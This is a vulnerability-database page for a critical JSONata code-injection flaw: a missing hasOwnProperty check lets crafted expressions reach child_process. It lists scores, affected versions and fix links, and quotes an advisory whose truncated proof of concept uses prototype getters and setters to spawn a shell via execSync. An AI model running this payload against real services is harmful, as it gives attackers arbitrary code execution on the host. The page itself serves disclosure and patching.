CVE-2026-77413
published 2026-08-21CVE-2026-77413: JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.0, the src/functions.js lookup function lacked an Object.prototype.hasOwnProperty…
PriorityP259critical9.3CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCNSINSANEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
EPSS
0.52%
43.0th percentile
JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.0, the src/functions.js lookup function lacked an Object.prototype.hasOwnProperty check and allowed crafted expressions to access inherited prototype members. An attacker able to supply an expression could use inherited prototype setters and getters, constructor access, valueOf, and process.getBuiltinModule to reach the child_process module and execute arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.0.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jsonata-js | jsonata | < 2.2.0 | 2.2.0 |
| jsonata | jsonata | >= 0 < 1.8.8 | 1.8.8 |
| jsonata | jsonata | >= 2.0.0 < 2.2.0 | 2.2.0 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
JSONata: Arbitrary Code Execution via crafted JSONata expressions
ghsa·2026-08-21
CVE-2026-77413 [CRITICAL] CWE-94 JSONata: Arbitrary Code Execution via crafted JSONata expressions
JSONata: Arbitrary Code Execution via crafted JSONata expressions
## Impact
Before JSONata `2.2.0` and `1.8.8` it was possible to execute arbitrary code with crafted expressions, due to a missing `hasOwnProperty` check in the `lookup` function:
https://github.com/jsonata-js/jsonata/blob/f9632e01e6e67d4f9f00593f9795420cb4b57f48/src/functions.js#L1686-L1705
This was fixed with https://github.com/jsonata-js/jsonata/pull/794, which is included in the `2.2.0` release, and ported in the `1.8.8` release.
## PoC
```js
import jsonata from "jsonata";
const expression = jsonata(`
(
__lookupSetter__('__proto__')(constructor);
__defineGetter__('l', constructor("return
process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'}).toString()"));
valueOf().l
)
`);
await expression.eval
VulDB
jsonata-js jsonata up to 1.8.7/2.1.x Lookup Function src/functions.js lookup code injection
vuldb·2026-08-21·CVSS 9.3
CVE-2026-77413 [CRITICAL] jsonata-js jsonata up to 1.8.7/2.1.x Lookup Function src/functions.js lookup code injection
A vulnerability marked as critical has been reported in jsonata-js jsonata up to 1.8.7/2.1.x. Impacted is the function lookup of the file src/functions.js of the component Lookup Function. The manipulation leads to code injection.
This vulnerability is listed as CVE-2026-77413. The attack may be initiated remotely. There is no available exploit.
It is suggested to upgrade the affected component.
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/jsonata-js/jsonata/commit/4b217d514376e30cba278941298d7ba97c4a6c6ehttps://github.com/jsonata-js/jsonata/commit/4c5f4adfb90a9b500889d50f90050ca68888b50dhttps://github.com/jsonata-js/jsonata/pull/794https://github.com/jsonata-js/jsonata/releases/tag/v1.8.8https://github.com/jsonata-js/jsonata/releases/tag/v2.2.0https://github.com/jsonata-js/jsonata/security/advisories/GHSA-8gq3-vp5j-2grphttps://github.com/jsonata-js/jsonata/security/advisories/GHSA-8gq3-vp5j-2grp
2026-08-21
Published